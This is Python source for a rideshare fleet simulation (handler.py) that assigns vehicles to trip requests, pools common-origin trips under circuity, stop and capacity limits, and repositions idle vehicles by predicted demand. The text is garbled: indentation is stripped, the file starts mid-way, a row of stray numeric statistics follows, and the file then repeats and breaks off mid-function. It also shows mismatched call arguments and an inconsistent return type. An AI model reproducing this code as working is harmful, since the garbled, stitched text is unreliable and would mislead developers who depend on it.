'''Create the initial vehicles_log.'''
list_trip_log = generic_ops.list_from_dict(trip_log)
first_n_trips = list_trip_log[:fleet_size]
vehicles_log = dict()
vehicle_id = 0
for trip_id, trip in first_n_trips:
cumulative_person_miles = trip_ops.get_person_miles_of_joined_trip(trip_log, trip_id)
cumulative_vehicle_miles = trip_ops.get_vehicle_miles_of_joined_trip(trip_log, trip_id)
vehicle = Vehicle(\
vehicle_id,
[trip.trip_id],
0,
trip.dropoff_pixel,
trip.dropoff_time,
cumulative_person_miles,
cumulative_vehicle_miles\
)
vehicles_log[vehicle_id] = vehicle
vehicle_id += 1
return vehicles_log
def find_best_common_origin_seq(trip_list, max_circuity, max_stops):
'''Given a list of trips, find the best rideshared route.'''
path = pixel_ops.hamilton_of_trip_list(trip_list)[1]
distinct_stops = dict()
origin_pixel = path[0][0]
prev_destination = origin_pixel
circuity_distance = 0
# Check if every trip in path meets the max circuity constraint and max stops constraint
# If constraints are met then this should NOT return None
for pair in path[1:]:
destination_pixel = pair[0]
distinct_stops[destination_pixel] = True
if len(distinct_stops) > max_stops:
return None
direct_manhattan_distance = pixel_ops.manhattan_distance(origin_pixel, destination_pixel)
circuity_distance += pixel_ops.manhattan_distance(prev_destination, destination_pixel)
prev_destination = destination_pixel
if direct_manhattan_distance != 0:
ratio = 1.0 * circuity_distance / direct_manhattan_distance
if ratio > max_circuity:
return None
return path[1:]
def predispatched_trips(trip_log, trip_location_hash_table, pickup_pixel):
'''Get the predispatched trips from a certain pickup_pixel.'''
trip = list(trip_location_hash_table[pickup_pixel])[-1][1]
return trip_ops.get_all_joined_trips(trip_log, trip.trip_id)
def optimal_route(trip, trip_log, trip_location_hash_table,
pickup_pixel, constraints):
'''Get the optimal route of rideshared trips'''
optimal_preorder = predispatched_trips( \
trip_log, trip_location_hash_table, pickup_pixel)
optimal_preorder += [trip]
optimal_order = find_best_common_origin_seq(optimal_preorder,
constraints['max_circuity'],
constraints['max_stops'])
return optimal_order
def sync_joined_trips(trip_log, trip_id, dispatch_time):
'''Sync the data for rideshared trips.'''
trip = trip_ops.get_trip(trip_log, trip_id)
vehicle_id = trip.vehicle_id
joined_trip_id = trip.joined_trip_id
pickup_location = trip.pickup_pixel
trip.pickup_time = dispatch_time
time_elapsed = pixel_ops.time_of_travel(pickup_location, trip.dropoff_pixel)
trip.dropoff_time = dispatch_time + time_elapsed
# For each subsequent trip, update the time elapsed to reach destination
# Update the vehicle id
while True:
joined_trip = trip_ops.get_trip(trip_log, joined_trip_id)
time_elapsed += pixel_ops.time_of_travel(trip.dropoff_pixel, joined_trip.dropoff_pixel)
joined_trip = joined_trip.set_actual_t(dispatch_time, dispatch_time + time_elapsed)
joined_trip = joined_trip.set_vehicle(vehicle_id)
trip_id = joined_trip_id
joined_trip_id = joined_trip.joined_trip_id
if joined_trip_id == trip_id:
break
return trip_log
def send_vehicle_for_this_request(trip_log, trip_id, vehicle_info, vehicles_log, constraints):
'''Assign vehicle to trip request.'''
departure_delay = constraints['departure_delay']
assert(vehicle_info is not None), "Vehicle Info is None"
vehicle_id = vehicle_info['vehicle_id']
time_delay = vehicle_info['time_delay']
# Update vehicle ID
trip = trip_ops.get_trip(trip_log, trip_id)
trip.vehicle_id = vehicle_id
# Update trip's time delay
trip = trip.increase_time_delay(max(time_delay, departure_delay))
# Update trip log
trip_log[trip_id] = trip
# Update vehicle log accordingly
vehicles_log[vehicle_id].add_trip_to_schedule(trip) # this causes absurd scale
return trip_log, vehicles_log
def get_vehicles_latest_trips(vehicles_log):
'''Get the latest scheduled location and time of all vehicles.'''
vehicle_locations = dict()
for vehicle in vehicles_log.values():
vehicle_locations[vehicle.vehicle_id] = \
(vehicle.most_recently_pinged_location, vehicle.time_of_last_ping)
return vehicle_locations
def vehicle_min_arrival_time(trip_log, trip_id, vehicles_log):
'''Get the vehicle that will arrive soonest for trip_id.'''
vehicles_latest_trips = get_vehicles_latest_trips(vehicles_log)
trip = trip_ops.get_trip(trip_log, trip_id)
request_time = trip.pickup_request_time
# Get the vehicle that can arrive soonest (with travel estimate)
closest_vehicle_info = None
min_time = sys.maxint
for vehicle_id, (pre_repositioned_location, pre_repositioned_time) \
in vehicles_latest_trips.items():
travel_time = pixel_ops.time_of_travel(pre_repositioned_location, trip.pickup_pixel)
# Vehicle is already there, use it
if travel_time == 0.0:
return (vehicle_id, pre_repositioned_location, 0.0)
time_vehicle_would_arrive = \
max(pre_repositioned_time, request_time) + travel_time
if time_vehicle_would_arrive < min_time:
min_time = time_vehicle_would_arrive
time_delay = time_vehicle_would_arrive - request_time
assert(time_delay >= 0), \
"""
Time Delay is negative: %s
Trip: %s
Pre Repositioned Time: %s
Pre Repositioned Location: %s
Request Time: %s
Travel Time: %s
Time Vehicle Would Arrive Here: %s
""" % (str(time_delay),
str(trip.__dict__),
str(pre_repositioned_time),
str(pre_repositioned_location),
str(request_time),
str(travel_time),
str(time_vehicle_would_arrive))
closest_vehicle_info = {"vehicle_id" : vehicle_id,
"pre_repositioned_location" : pre_repositioned_location,
"time_delay" : time_delay}
assert(min_time != sys.maxint), "Closest Vehicle not selected"
return closest_vehicle_info
def get_vehicle_for_this_trip(trip_log, trip_id, vehicles_log):
'''Get the vehicle to be assigned for this trip.'''
vehicle = vehicle_min_arrival_time(trip_log, trip_id, vehicles_log)
return vehicle
def do_request_new_vehicle(trip_log, trip_id, vehicles_log,
constraints, trip_buffer, trip_location_hash_table):
'''Request a new vehicle for this trip, handle info'''
# Helper variables
trip = trip_ops.get_trip(trip_log, trip_id)
pickup_pixel, dropoff_pixel = (trip.pickup_pixel, trip.dropoff_pixel)
# Need to a request a new vehicle for this trip
# (1) Identify which vehicle is needed
# (2) Update data structures to link this trip request to that vehicle and "send vehicle"
vehicle_for_this_trip = get_vehicle_for_this_trip(trip_log, trip_id, vehicles_log)
trip_log, vehicles_log = send_vehicle_for_this_request(trip_log, trip_id,
vehicle_for_this_trip,
vehicles_log, constraints)
# We want to put this trip, therefore, in the trip fulfillment queue and location dict
trip_buffer = generic_ops.deque_put_in_place(trip_buffer, (trip, trip.pickup_time))
trip_location_hash_table[pickup_pixel].append((dropoff_pixel, trip))
return trip_log, vehicles_log
def is_this_vehicles_latest_loc(trip_log, vehicles_log,
trip_location_hash_table, pickup_pixel):
'''Is the vehicle's latest scheduled trip the latest trip scheduled at this pickup pixel?'''
if len(trip_location_hash_table[pickup_pixel]) == 0:
return False
the_trip_scheduled_from_this_origin = trip_location_hash_table[pickup_pixel][-1]
trip = the_trip_scheduled_from_this_origin[1]
last_common_origin_trip = trip_ops.get_last_joined_trip(trip_log, trip.trip_id)
vehicle_id = last_common_origin_trip.vehicle_id
the_latest_trip_scheduled_with_this_vehicle = vehicles_log[vehicle_id].latest_trip
return str(the_latest_trip_scheduled_with_this_vehicle) == str(trip.trip_id)
def get_joined_trip_occupants(trip_legs):
'''Get the number of total occupants for all trip legs of a rideshared trip'''
total = 0
for trip_leg in trip_legs:
total += trip_leg.occupancy
return total
def common_origin_validation(trip_location_hash_table, trip_log,
vehicles_log, new_trip_request, constraints):
'''Run the common origin validation process'''
vehicle_size = constraints['vehicle_size']
request_new_vehicle = True
optimal_order = None
pickup_pixel = new_trip_request.pickup_pixel
there_exists_undispatched_vehicle_from_this_origin = \
len(trip_location_hash_table[pickup_pixel]) > 0
# If there exists a vehicle from this origin
if there_exists_undispatched_vehicle_from_this_origin:
# This is the Greedy Common Origin Trip Sender
# If the vehicle's latest undispatched trip is not from this origin,
# then request a new vehicle
if not is_this_vehicles_latest_loc(trip_log,
vehicles_log,
trip_location_hash_table,
pickup_pixel):
request_new_vehicle = True
else:
# Get pickup time of the trip
first_leg_of_trip_here = list(trip_location_hash_table[pickup_pixel])[0][1]
if new_trip_request.pickup_request_time > first_leg_of_trip_here.pickup_time:
request_new_vehicle = True
else:
# SUBJECT TO vehicle_size CONSTRAINT
current_joined_trip = [that_trip[1] \
for that_trip \
in list(trip_location_hash_table[pickup_pixel])]
current_vehicle_occupancy = get_joined_trip_occupants(current_joined_trip)
vehicle_would_exceed_capacity = \
current_vehicle_occupancy + new_trip_request.occupancy > vehicle_size
if vehicle_would_exceed_capacity:
request_new_vehicle = True
else:
# SUBJECT TO MAX CIRCUITY AND MAX STOPS CONSTRAINTS
optimal_order = optimal_route(new_trip_request,
trip_log,
trip_location_hash_table,
pickup_pixel,
constraints)
request_new_vehicle = optimal_order is None
return request_new_vehicle, optimal_order
def resequence_joined_trip_ids(trip_log, ordered_joined_trips):
'''Resync joined trip ids'''
for i in range(0, len(ordered_joined_trips) - 1):
trip = ordered_joined_trips[i]
trip.joined_trip_id = ordered_joined_trips[i + 1].trip_id
last_trip = ordered_joined_trips[-1]
last_trip.joined_trip_id = last_trip.trip_id
return trip_log
def greedy_common_origin_scheduler(trip_log, vehicles_log, trip_location_hash_table,
trip_buffer, new_trip_request, optimal_order):
'''Run Greedy Common Origin Strategy heuristic'''
pickup_pixel = new_trip_request.pickup_pixel
optimal_order_CO_destinations = [trip[1] for trip in optimal_order]
new_first_trip_of_route = optimal_order_CO_destinations[0]
scheduled_trip_from_this_origin = list(trip_location_hash_table[pickup_pixel])[-1][1]
pickup_time = scheduled_trip_from_this_origin.pickup_time
vehicle_id = scheduled_trip_from_this_origin.vehicle_id
trip_log = resequence_joined_trip_ids(trip_log, optimal_order_CO_destinations)
vehicles_log[vehicle_id] = \
vehicles_log[vehicle_id].replace_last_trip(new_first_trip_of_route)
new_trip_request.set_vehicle(vehicle_id)
sync_joined_trips(trip_log, new_first_trip_of_route.trip_id, pickup_time)
generic_ops.deque_replace(trip_buffer,
(scheduled_trip_from_this_origin, pickup_time),
(new_first_trip_of_route, pickup_time))
trip_location_hash_table[pickup_pixel].popleft()
trip_location_hash_table[pickup_pixel].append((optimal_order[0][0], new_first_trip_of_route))
return trip_log, vehicles_log, trip_location_hash_table
def process_request(trip_log, trip, vehicles_log,
constraints, trip_location_hash_table, trip_buffer):
'''Run the general process for a single trip request'''
greedy = constraints['greedy_common_origin']
request_new_vehicle = True # default true, but turn false if vehicle is available
# Helper variables
new_trip_request = trip
pickup_pixel = new_trip_request.pickup_pixel
# If the origin point has NOT been accounted for yet then set it up as
# an empty deque of destination points
if pickup_pixel not in trip_location_hash_table.keys():
trip_location_hash_table[pickup_pixel] = deque()
# Determine whether to request new vehicle or not
request_new_vehicle, optimal_order = common_origin_validation(\
trip_location_hash_table, trip_log, vehicles_log, new_trip_request, constraints)
# HACK: to make sure that pickup_request time is not after pickup time
if optimal_order is not None:
pickup_pixel = new_trip_request.pickup_pixel
new_first_trip_of_route = optimal_order[0][1]
scheduled_trip_from_this_origin = list(trip_location_hash_table[pickup_pixel])[-1][1]
pickup_time = scheduled_trip_from_this_origin.pickup_time
if new_first_trip_of_route.pickup_request_time > pickup_time:
request_new_vehicle = True
# Request a vehicle from the fleet
if request_new_vehicle:
trip_log, vehicles_log = \
do_request_new_vehicle(trip_log,
trip.trip_id,
vehicles_log,
constraints,
trip_buffer,
trip_location_hash_table)
# Enter RIDESHARE process
# Greedy Heuristic
else:
if greedy:
trip_log, vehicles_log, trip_location_hash_table = \
greedy_common_origin_scheduler(trip_log,
vehicles_log,
trip_location_hash_table,
trip_buffer,
new_trip_request,
optimal_order)
return trip_log, vehicles_log
def handle_requests_at_this_time(trip_log, vehicles_log,
requests, constraints,
trip_location_hash_table, trip_buffer, beliefs):
'''Run the processes for all requests in this batch'''
list_of_trip_requests_now = requests
for trip in list_of_trip_requests_now:
trip_log[trip.trip_id] = trip
trip_log, vehicles_log = process_request(trip_log,
trip,
vehicles_log,
constraints,
trip_location_hash_table,
trip_buffer)
if int(constraints['freq_levrs']) != 0:
betas = {'initial' : constraints['initial_beta'], 'obs' : constraints['beta_obs']}
beliefs = demand_learning.update_belief_model(trip, beliefs, betas)
return trip_log, vehicles_log, beliefs
def clear_trips_for_dispatch(trip_log, dispatch_time, vehicles_log,
trip_location_hash_table,
trip_buffer, dict_writer):
'''Send dispatched files to output, remove from data structures'''
if len(trip_buffer) < 1:
return trip_location_hash_table, trip_buffer
while len(trip_buffer) > 0:
next_to_dispatch_trip, next_to_dispatch_pickup_time = trip_buffer[0]
if floor(next_to_dispatch_pickup_time) <= floor(dispatch_time):
pickup_pixel = next_to_dispatch_trip.pickup_pixel
vehicle_id = next_to_dispatch_trip.vehicle_id
vehicles_log[vehicle_id].cumulative_person_miles += \
trip_ops.get_person_miles_of_joined_trip(trip_log, next_to_dispatch_trip.trip_id)
vehicles_log[vehicle_id].cumulative_vehicle_miles += \
trip_ops.get_vehicle_miles_of_joined_trip(trip_log, next_to_dispatch_trip.trip_id)
all_joined_trips = trip_ops.get_all_joined_trips(trip_log,
next_to_dispatch_trip.trip_id)
for that_trip in all_joined_trips:
assert(that_trip.valid()), "Trip being written is invalid" # this needs to be true
dict_writer.writerow(that_trip.__dict__)
del trip_log[that_trip.trip_id]
trip_buffer.popleft()
trip_location_hash_table[pickup_pixel].popleft()
else:
break
return
def receive_requests_now(reader, time, rollover_request):
'''Listen for requests at this time from the stream'''
if rollover_request is None:
requests_now = list()
else:
requests_now = [rollover_request]
while True:
try:
next_line = reader.next()
trip = trip_ops.process_cleaned_trip(next_line)
if trip.pickup_request_time > time:
return requests_now, trip
else:
requests_now.append(trip)
except StopIteration:
return None, None
def handle_all_trip_requests(constraints):
'''Main function'''
fleet_size = constraints['fleet_size']
beliefs = constraints['beliefs']
local_demand_degree = constraints['local_demand_degree']
freq_levrs = int(constraints['freq_levrs'])
cleaned_filepath = generic_ops.cleaned_fp(constraints['raw'])
result_filepath = generic_ops.results_fp(constraints['raw'], constraints['index'])
#-------------------------------------------------------- START READER OPS
inputfile = open(cleaned_filepath, 'rb')
reader = csv.DictReader(inputfile)
initial_trip_log = trip_ops.read_n_cleaned_trips(reader, fleet_size)
#-------------------------------------------------------- END READER OPS
#-------------------------------------------------------- START WRITER OPS
open(result_filepath, 'w').close() # reset the output file
outputfile = open(result_filepath, 'wa')
keys = initial_trip_log.values()[0].__dict__.keys()
dict_writer = csv.DictWriter(outputfile, keys)
dict_writer.writeheader()
for trip in initial_trip_log.values():
dict_writer.writerow(trip.__dict__)
#-------------------------------------------------------- END WRITER OPS
# trip_location_hash_table is a data structure that is a dict of trip origin points,
# each origin point contains a list of trips scheduled to leave from that point,
# represented solely by the trip that is the first-stop of that trip
# trip_buffer is a double-queue data structure that enqueues requests as they come in
# and dequeues them when they are dispatched.
# trip_log is a dict that is synced with the trip_buffer,
# contains more detailed info about trips
trip_location_hash_table = dict()
trip_buffer = deque()
# Transform Trip Log to Be Index By Vehicle ID
vehicles_log = initial_vehicle_log(initial_trip_log, fleet_size)
# Get time of last initial pickup request
start_time = initial_trip_log.values()[-1].pickup_request_time
# Clear this variable to save memory
initial_trip_log = None
trip_log = dict()
time = start_time
rollover_request = None
while True:
requests, rollover_request = receive_requests_now(reader, time, rollover_request)
# There are no incoming trip requests or trips left to dispatch. End Loop
if requests is None and len(trip_buffer) == 0:
break
# There are trip requests this turn. Process them.
if requests is not None and len(requests) >= 0:
trip_log, vehicles_log, beliefs = \
handle_requests_at_this_time(trip_log,
vehicles_log,
requests,
constraints,
trip_location_hash_table,
trip_buffer,
beliefs)
counter = 0
for pickup_pixel in trip_location_hash_table:
counter += len(trip_location_hash_table[pickup_pixel])
# Clear trips ready for dispatch at this time
clear_trips_for_dispatch(trip_log,
vehicles_log,
constraints,
trip_location_hash_table,
trip_buffer,
dict_writer)
# LEVRS Handling
if freq_levrs != 0 and time % freq_levrs == 0:
vehicles_log = \
handle_empty_repositioning(vehicles_log, time, beliefs, local_demand_degree)
time += 1 # next iteration of time
outputfile.close()
assert(len(trip_log) == 0), "There were %s undispatched trips." % (str(len(trip_log)))
return vehicles_log
| 43.796522 | 98 | 0.64611 | #!/usr/bin/env python
"""
Filename: handler.py
Author: Keith Gladstone
Description:
This file is the heart of the program
It handles all vehicle allocation and repositioning
Contains trip_buffer, trip_location_hash_table, etc.
"""
import csv
import sys
from collections import deque
from math import floor
from vehicle import Vehicle
import trip_ops
import generic_ops
import pixel_ops
import demand_learning
def local_demand_predictor(current_p, day, time_block, beliefs, local_demand_degree):
'''Determines optimal cardinal direction to move vehicle.'''
current_x, current_y = current_p
directional_demand = [0, 0, 0, 0] # right, up, left, down
target_pixel = [(current_x + 1, current_y),
(current_x, current_y + 1),
(current_x - 1, current_y),
(current_x, current_y - 1)]
superpixel = pixel_ops.get_superpixel_degree_n(current_p, local_demand_degree)
for city_pixel, pixel_demand in beliefs.iteritems():
if city_pixel in superpixel:
(pixel_x, pixel_y) = city_pixel
demand_value = pixel_demand[generic_ops.get_day_code(day)][time_block][0]
if pixel_x > current_x:
directional_demand[0] += demand_value
if pixel_y > current_y:
directional_demand[1] += demand_value
if pixel_x < current_x:
directional_demand[2] += demand_value
if pixel_y < current_y:
directional_demand[3] += demand_value
return target_pixel[max((v, i) for i, v in enumerate(directional_demand))[1]]
def handle_empty_repositioning(vehicles_log, time, beliefs, local_demand_degree):
'''Moves vehicle using LEVRS.'''
time_block = generic_ops.get_time_block_from_time(time)
day_of_week = generic_ops.get_day_of_week_from_time(time)
empty_vehicles = list()
for vehicle_id in vehicles_log:
vehicle = vehicles_log[vehicle_id]
last_pinged_time = vehicle.time_of_last_ping
if last_pinged_time < time:
empty_vehicles.append(vehicle)
if len(empty_vehicles) == 0:
return vehicles_log
for empty_vehicle in empty_vehicles:
current_loc = empty_vehicle.most_recently_pinged_location
incremental_reposition = local_demand_predictor(\
current_loc, day_of_week, time_block, beliefs, local_demand_degree)
vehicles_log[empty_vehicle.vehicle_id] = \
empty_vehicle.empty_reposition(time, incremental_reposition)
return vehicles_log
def initial_vehicle_log(trip_log, fleet_size):
'''Create the initial vehicles_log.'''
list_trip_log = generic_ops.list_from_dict(trip_log)
first_n_trips = list_trip_log[:fleet_size]
vehicles_log = dict()
vehicle_id = 0
for trip_id, trip in first_n_trips:
cumulative_person_miles = trip_ops.get_person_miles_of_joined_trip(trip_log, trip_id)
cumulative_vehicle_miles = trip_ops.get_vehicle_miles_of_joined_trip(trip_log, trip_id)
vehicle = Vehicle(\
vehicle_id,
[trip.trip_id],
0,
trip.dropoff_pixel,
trip.dropoff_time,
cumulative_person_miles,
cumulative_vehicle_miles\
)
vehicles_log[vehicle_id] = vehicle
vehicle_id += 1
return vehicles_log
def find_best_common_origin_seq(trip_list, max_circuity, max_stops):
'''Given a list of trips, find the best rideshared route.'''
path = pixel_ops.hamilton_of_trip_list(trip_list)[1]
distinct_stops = dict()
origin_pixel = path[0][0]
prev_destination = origin_pixel
circuity_distance = 0
# Check if every trip in path meets the max circuity constraint and max stops constraint
# If constraints are met then this should NOT return None
for pair in path[1:]:
destination_pixel = pair[0]
distinct_stops[destination_pixel] = True
if len(distinct_stops) > max_stops:
return None
direct_manhattan_distance = pixel_ops.manhattan_distance(origin_pixel, destination_pixel)
circuity_distance += pixel_ops.manhattan_distance(prev_destination, destination_pixel)
prev_destination = destination_pixel
if direct_manhattan_distance != 0:
ratio = 1.0 * circuity_distance / direct_manhattan_distance
if ratio > max_circuity:
return None
return path[1:]
def predispatched_trips(trip_log, trip_location_hash_table, pickup_pixel):
'''Get the predispatched trips from a certain pickup_pixel.'''
trip = list(trip_location_hash_table[pickup_pixel])[-1][1]
return trip_ops.get_all_joined_trips(trip_log, trip.trip_id)
def optimal_route(trip, trip_log, trip_location_hash_table,
pickup_pixel, constraints):
'''Get the optimal route of rideshared trips'''
optimal_preorder = predispatched_trips( \
trip_log, trip_location_hash_table, pickup_pixel)
optimal_preorder += [trip]
optimal_order = find_best_common_origin_seq(optimal_preorder,
constraints['max_circuity'],
constraints['max_stops'])
return optimal_order
def sync_joined_trips(trip_log, trip_id, dispatch_time):
'''Sync the data for rideshared trips.'''
trip = trip_ops.get_trip(trip_log, trip_id)
vehicle_id = trip.vehicle_id
joined_trip_id = trip.joined_trip_id
pickup_location = trip.pickup_pixel
trip.pickup_time = dispatch_time
time_elapsed = pixel_ops.time_of_travel(pickup_location, trip.dropoff_pixel)
trip.dropoff_time = dispatch_time + time_elapsed
# For each subsequent trip, update the time elapsed to reach destination
# Update the vehicle id
while True:
joined_trip = trip_ops.get_trip(trip_log, joined_trip_id)
time_elapsed += pixel_ops.time_of_travel(trip.dropoff_pixel, joined_trip.dropoff_pixel)
joined_trip = joined_trip.set_actual_t(dispatch_time, dispatch_time + time_elapsed)
joined_trip = joined_trip.set_vehicle(vehicle_id)
trip_id = joined_trip_id
joined_trip_id = joined_trip.joined_trip_id
if joined_trip_id == trip_id:
break
return trip_log
def send_vehicle_for_this_request(trip_log, trip_id, vehicle_info, vehicles_log, constraints):
'''Assign vehicle to trip request.'''
departure_delay = constraints['departure_delay']
assert(vehicle_info is not None), "Vehicle Info is None"
vehicle_id = vehicle_info['vehicle_id']
time_delay = vehicle_info['time_delay']
# Update vehicle ID
trip = trip_ops.get_trip(trip_log, trip_id)
trip.vehicle_id = vehicle_id
# Update trip's time delay
trip = trip.increase_time_delay(max(time_delay, departure_delay))
# Update trip log
trip_log[trip_id] = trip
# Update vehicle log accordingly
vehicles_log[vehicle_id].add_trip_to_schedule(trip) # this causes absurd scale
return trip_log, vehicles_log
def get_vehicles_latest_trips(vehicles_log):
'''Get the latest scheduled location and time of all vehicles.'''
vehicle_locations = dict()
for vehicle in vehicles_log.values():
vehicle_locations[vehicle.vehicle_id] = \
(vehicle.most_recently_pinged_location, vehicle.time_of_last_ping)
return vehicle_locations
def vehicle_min_arrival_time(trip_log, trip_id, vehicles_log):
'''Get the vehicle that will arrive soonest for trip_id.'''
vehicles_latest_trips = get_vehicles_latest_trips(vehicles_log)
trip = trip_ops.get_trip(trip_log, trip_id)
request_time = trip.pickup_request_time
# Get the vehicle that can arrive soonest (with travel estimate)
closest_vehicle_info = None
min_time = sys.maxint
for vehicle_id, (pre_repositioned_location, pre_repositioned_time) \
in vehicles_latest_trips.items():
travel_time = pixel_ops.time_of_travel(pre_repositioned_location, trip.pickup_pixel)
# Vehicle is already there, use it
if travel_time == 0.0:
return (vehicle_id, pre_repositioned_location, 0.0)
time_vehicle_would_arrive = \
max(pre_repositioned_time, request_time) + travel_time
if time_vehicle_would_arrive < min_time:
min_time = time_vehicle_would_arrive
time_delay = time_vehicle_would_arrive - request_time
assert(time_delay >= 0), \
"""
Time Delay is negative: %s
Trip: %s
Pre Repositioned Time: %s
Pre Repositioned Location: %s
Request Time: %s
Travel Time: %s
Time Vehicle Would Arrive Here: %s
""" % (str(time_delay),
str(trip.__dict__),
str(pre_repositioned_time),
str(pre_repositioned_location),
str(request_time),
str(travel_time),
str(time_vehicle_would_arrive))
closest_vehicle_info = {"vehicle_id" : vehicle_id,
"pre_repositioned_location" : pre_repositioned_location,
"time_delay" : time_delay}
assert(min_time != sys.maxint), "Closest Vehicle not selected"
return closest_vehicle_info
def get_vehicle_for_this_trip(trip_log, trip_id, vehicles_log):
'''Get the vehicle to be assigned for this trip.'''
vehicle = vehicle_min_arrival_time(trip_log, trip_id, vehicles_log)
return vehicle
def do_request_new_vehicle(trip_log, trip_id, vehicles_log,
constraints, trip_buffer, trip_location_hash_table):
'''Request a new vehicle for this trip, handle info'''
# Helper variables
trip = trip_ops.get_trip(trip_log, trip_id)
pickup_pixel, dropoff_pixel = (trip.pickup_pixel, trip.dropoff_pixel)
# Need to a request a new vehicle for this trip
# (1) Identify which vehicle is needed
# (2) Update data structures to link this trip request to that vehicle and "send vehicle"
vehicle_for_this_trip = get_vehicle_for_this_trip(trip_log, trip_id, vehicles_log)
trip_log, vehicles_log = send_vehicle_for_this_request(trip_log, trip_id,
vehicle_for_this_trip,
vehicles_log, constraints)
# We want to put this trip, therefore, in the trip fulfillment queue and location dict
trip_buffer = generic_ops.deque_put_in_place(trip_buffer, (trip, trip.pickup_time))
trip_location_hash_table[pickup_pixel].append((dropoff_pixel, trip))
return trip_log, vehicles_log
def is_this_vehicles_latest_loc(trip_log, vehicles_log,
trip_location_hash_table, pickup_pixel):
'''Is the vehicle's latest scheduled trip the latest trip scheduled at this pickup pixel?'''
if len(trip_location_hash_table[pickup_pixel]) == 0:
return False
the_trip_scheduled_from_this_origin = trip_location_hash_table[pickup_pixel][-1]
trip = the_trip_scheduled_from_this_origin[1]
last_common_origin_trip = trip_ops.get_last_joined_trip(trip_log, trip.trip_id)
vehicle_id = last_common_origin_trip.vehicle_id
the_latest_trip_scheduled_with_this_vehicle = vehicles_log[vehicle_id].latest_trip
return str(the_latest_trip_scheduled_with_this_vehicle) == str(trip.trip_id)
def get_joined_trip_occupants(trip_legs):
'''Get the number of total occupants for all trip legs of a rideshared trip'''
total = 0
for trip_leg in trip_legs:
total += trip_leg.occupancy
return total
def common_origin_validation(trip_location_hash_table, trip_log,
vehicles_log, new_trip_request, constraints):
'''Run the common origin validation process'''
vehicle_size = constraints['vehicle_size']
request_new_vehicle = True
optimal_order = None
pickup_pixel = new_trip_request.pickup_pixel
there_exists_undispatched_vehicle_from_this_origin = \
len(trip_location_hash_table[pickup_pixel]) > 0
# If there exists a vehicle from this origin
if there_exists_undispatched_vehicle_from_this_origin:
# This is the Greedy Common Origin Trip Sender
# If the vehicle's latest undispatched trip is not from this origin,
# then request a new vehicle
if not is_this_vehicles_latest_loc(trip_log,
vehicles_log,
trip_location_hash_table,
pickup_pixel):
request_new_vehicle = True
else:
# Get pickup time of the trip
first_leg_of_trip_here = list(trip_location_hash_table[pickup_pixel])[0][1]
if new_trip_request.pickup_request_time > first_leg_of_trip_here.pickup_time:
request_new_vehicle = True
else:
# SUBJECT TO vehicle_size CONSTRAINT
current_joined_trip = [that_trip[1] \
for that_trip \
in list(trip_location_hash_table[pickup_pixel])]
current_vehicle_occupancy = get_joined_trip_occupants(current_joined_trip)
vehicle_would_exceed_capacity = \
current_vehicle_occupancy + new_trip_request.occupancy > vehicle_size
if vehicle_would_exceed_capacity:
request_new_vehicle = True
else:
# SUBJECT TO MAX CIRCUITY AND MAX STOPS CONSTRAINTS
optimal_order = optimal_route(new_trip_request,
trip_log,
trip_location_hash_table,
pickup_pixel,
constraints)
request_new_vehicle = optimal_order is None
return request_new_vehicle, optimal_order
def resequence_joined_trip_ids(trip_log, ordered_joined_trips):
'''Resync joined trip ids'''
for i in range(0, len(ordered_joined_trips) - 1):
trip = ordered_joined_trips[i]
trip.joined_trip_id = ordered_joined_trips[i + 1].trip_id
last_trip = ordered_joined_trips[-1]
last_trip.joined_trip_id = last_trip.trip_id
return trip_log
def greedy_common_origin_scheduler(trip_log, vehicles_log, trip_location_hash_table,
trip_buffer, new_trip_request, optimal_order):
'''Run Greedy Common Origin Strategy heuristic'''
pickup_pixel = new_trip_request.pickup_pixel
optimal_order_CO_destinations = [trip[1] for trip in optimal_order]
new_first_trip_of_route = optimal_order_CO_destinations[0]
scheduled_trip_from_this_origin = list(trip_location_hash_table[pickup_pixel])[-1][1]
pickup_time = scheduled_trip_from_this_origin.pickup_time
vehicle_id = scheduled_trip_from_this_origin.vehicle_id
trip_log = resequence_joined_trip_ids(trip_log, optimal_order_CO_destinations)
vehicles_log[vehicle_id] = \
vehicles_log[vehicle_id].replace_last_trip(new_first_trip_of_route)
new_trip_request.set_vehicle(vehicle_id)
sync_joined_trips(trip_log, new_first_trip_of_route.trip_id, pickup_time)
generic_ops.deque_replace(trip_buffer,
(scheduled_trip_from_this_origin, pickup_time),
(new_first_trip_of_route, pickup_time))
trip_location_hash_table[pickup_pixel].popleft()
trip_location_hash_table[pickup_pixel].append((optimal_order[0][0], new_first_trip_of_route))
return trip_log, vehicles_log, trip_location_hash_table
def process_request(trip_log, trip, vehicles_log,
constraints, trip_location_hash_table, trip_buffer):
'''Run the general process for a single trip request'''
greedy = constraints['greedy_common_origin']
request_new_vehicle = True # default true, but turn false if vehicle is available
# Helper variables
new_trip_request = trip
pickup_pixel = new_trip_request.pickup_pixel
# If the origin point has NOT been accounted for yet then set it up as
# an empty deque of destination points
if pickup_pixel not in trip_location_hash_table.keys():
trip_location_hash_table[pickup_pixel] = deque()
# Determine whether to request new vehicle or not
request_new_vehicle, optimal_order = common_origin_validation(\
trip_location_hash_table, trip_log, vehicles_log, new_trip_request, constraints)
# HACK: to make sure that pickup_request time is not after pickup time
if optimal_order is not None:
pickup_pixel = new_trip_request.pickup_pixel
new_first_trip_of_route = optimal_order[0][1]
scheduled_trip_from_this_origin = list(trip_location_hash_table[pickup_pixel])[-1][1]
pickup_time = scheduled_trip_from_this_origin.pickup_time
if new_first_trip_of_route.pickup_request_time > pickup_time:
request_new_vehicle = True
# Request a vehicle from the fleet
if request_new_vehicle:
trip_log, vehicles_log = \
do_request_new_vehicle(trip_log,
trip.trip_id,
vehicles_log,
constraints,
trip_buffer,
trip_location_hash_table)
# Enter RIDESHARE process
# Greedy Heuristic
else:
if greedy:
trip_log, vehicles_log, trip_location_hash_table = \
greedy_common_origin_scheduler(trip_log,
vehicles_log,
trip_location_hash_table,
trip_buffer,
new_trip_request,
optimal_order)
return trip_log, vehicles_log
def handle_requests_at_this_time(trip_log, vehicles_log,
requests, constraints,
trip_location_hash_table, trip_buffer, beliefs):
'''Run the processes for all requests in this batch'''
list_of_trip_requests_now = requests
for trip in list_of_trip_requests_now:
trip_log[trip.trip_id] = trip
trip_log, vehicles_log = process_request(trip_log,
trip,
vehicles_log,
constraints,
trip_location_hash_table,
trip_buffer)
if int(constraints['freq_levrs']) != 0:
betas = {'initial' : constraints['initial_beta'], 'obs' : constraints['beta_obs']}
beliefs = demand_learning.update_belief_model(trip, beliefs, betas)
return trip_log, vehicles_log, beliefs
def clear_trips_for_dispatch(trip_log, dispatch_time, vehicles_log,
trip_location_hash_table,
trip_buffer, dict_writer):
